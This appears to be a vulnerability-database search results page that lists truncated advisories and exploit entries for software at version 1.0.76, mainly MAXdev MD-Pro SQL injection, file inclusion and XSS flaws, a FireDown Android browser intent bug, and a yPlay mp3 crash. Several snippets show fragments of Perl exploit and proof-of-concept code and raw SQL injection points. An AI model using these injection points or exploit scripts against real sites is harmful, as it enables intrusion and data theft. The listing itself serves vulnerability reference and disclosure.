Solarized FireDown Browser & Downloader 安全漏洞

Solarized FireDown Browser & Downloader is a powerful browser for Android devices from Solarized. A security vulnerability exists in Solarized FireDown Browser & Downloader version 1.0.76, which originates from a vulnerability that could allow a remote attacker to execute arbitrary JavaScript cod...

PT-2024-24328 · Unknown · Com.Solarized.Firedown

Name of the Vulnerable Software and Affected Versions: com.solarized.firedown aka Solarized FireDown Browser & Downloader version 1.0.76 Description: The issue allows a remote attacker to execute arbitrary JavaScript code via a crafted intent. This is possible because...

yPlay 1.0.76 (.mp3) Local Crash PoC

No description provided by source. !/usr/bin/perl Usage--file created--load file--b00m.mp3 BOOM print \n; print ! yPlay 1.0.76 .mp3 Local Crash PoC\n; print \n; print ! Author: cr4wl3r\n; print ! Mail: cr4wl3r!linuxmail.org\n; print \n; my $boom = A x 1337; my $filename = b00m.mp3; open...

MDPro 1.0.76 Index.PHP SQL Injection Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/22293/info MDPro is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromis...

MD-Pro 1.0.76 Index.PHP Firefox ID SQL Injection Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/25864/info MD-Pro is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromi...

yPlay 1.0.76 (.mp3) Local Crash PoC

Exploit for unknown platform in category dos / poc =================================== yPlay 1.0.76 .mp3 Local Crash PoC =================================== !/usr/bin/perl Usage--file created--load file--b00m.mp3 BOOM print "\n"; print "! yPlay 1.0.76 .mp3 Local Crash PoC\n"; print "\n"; print "!...

yPlay 1.0.76 - '.mp3' Local Crash (PoC)

!/usr/bin/perl Usage--file created--load file--b00m.mp3 BOOM print "\n"; print "! yPlay 1.0.76 .mp3 Local Crash PoC\n"; print "\n"; print "! Author: cr4wl3r\n"; print "! Mail: cr4wl3r!linuxmail.org\n"; print "\n"; my $boom = "A" x 1337; my $filename = "b00m.mp3"; open FILE,"$filename"; print FILE...

yPlay 1.0.76 Proof Of Concept

!/usr/bin/perl Usage--file created--load file--b00m.mp3 BOOM print "\n"; print "! yPlay 1.0.76 .mp3 Local Crash PoC\n"; print "\n"; print "! Author: cr4wl3r\n"; print "! Mail: cr4wl3r!linuxmail.org\n"; print "\n"; my $boom = "A" x 1337; my $filename = "b00m.mp3"; open FILE,"$filename"; print FILE...

CVE-2007-5222

CVE-2007-5222 is a SQL injection vulnerability in MAXdev MDPro (MD-Pro) 1.0.76 via a Referer header containing the substring "Firefox ID=", enabling remote attackers to inject arbitrary SQL. The affected component is index.php; root cause is crafted input in Referer header. Impact is partial disc...

PT-2007-6305 · Maxdev · Maxdev Md-Pro

Name of the Vulnerable Software and Affected Versions: MAXdev MDPro MD-Pro version 1.0.76 Description: The issue allows remote attackers to execute arbitrary SQL commands. This is achieved by including a specific substring in the Referer HTTP header. The Firefox ID= substring is used to inject SQ...

mdpro1076-sql.txt

!/usr/bin/perl use strict; use IO::Socket; my $app = "MDPro 1.0.76"; my $type = "SQL Injection"; my $author = "undefined1"; my $settings = "magicquotesruntime = off, mysql = 4.1.0"; $| = 1; print ":: $app $type - by $author ::\n\n\n"; my $url = shift || usage; if$url = m/^?:http://./ $url = $1;...

MD-Pro 1.0.76 - SQL Injection

MD-Pro 1.0.76 - SQL Injection !/usr/bin/perl use strict; use IO::Socket; my $app = "MDPro 1.0.76"; my $type = "SQL Injection"; my $author = "undefined1"; my $settings = "magicquotesruntime = off, mysql = 4.1.0"; $| = 1; print ":: $app $type - by $author ::\n\n\n"; my $url = shift || usage; if$url...

MDPro 1.0.76 Remote SQL Injection Exploit

Exploit for unknown platform in category web applications ========================================= MDPro 1.0.76 Remote SQL Injection Exploit ========================================= !/usr/bin/perl use strict; use IO::Socket; my $app = "MDPro 1.0.76"; my $type = "SQL Injection"; my $author =...

Design/Logic Flaw

user.php in MAXdev MDPro 1.0.76 allows remote attackers to obtain the full path via a ' quote character, and possibly other invalid values, in the uname parameter in a userinfo operation...

mdpro-sql.txt

From: [email protected] To: [email protected] Subject: MDPro 1.0.76 - Multiple Remote Vulnerabilities SQL Injection: index.php?module=News&startrow='sql injection Show path to script: user.php?op=userinfo&uname='...

MDPro 1.0.76 - index.php SQL Injection

MDPro 1.0.76 - index.php SQL Injection source: https://www.securityfocus.com/bid/22293/info MDPro is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to...

MDPro <= 1.0.76 (Cookie: PNSVlang) Local File Include Exploit

Exploit for unknown platform in category web applications ============================================================= MDPro = 1.0.76 Cookie: PNSVlang Local File Include Exploit ============================================================= ? print ' ::::::::: :::::::::: ::: ::: ::::::::::: ::: :...

CVE-2006-5564

CVE-2006-5564 is an XSS vulnerability in MAXdev MD-Pro 1.0.76, exploitable via the op parameter in user.php. The issue allows remote attackers to inject arbitrary web script/HTML. The NVD record lists a base score of 4.3 (Medium) with Network attack vector, no confidentiality impact, partial inte...

MAXdev MD-Pro 1.0.76 - &#039;user.php&#039; Cross-Site Scripting

MAXdev MD-Pro is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacke...

[SA19563] MAXdev MD-Pro ADOdb &quot;server.php&quot; Insecure Test Script Security Issue

TITLE: MAXdev MD-Pro ADOdb "server.php" Insecure Test Script Security Issue SECUNIA ADVISORY ID: SA19563 VERIFY ADVISORY: http://secunia.com/advisories/19563/ CRITICAL: Moderately critical IMPACT: Security Bypass, System access WHERE: From remote SOFTWARE: MAXdev MD-Pro 1.x...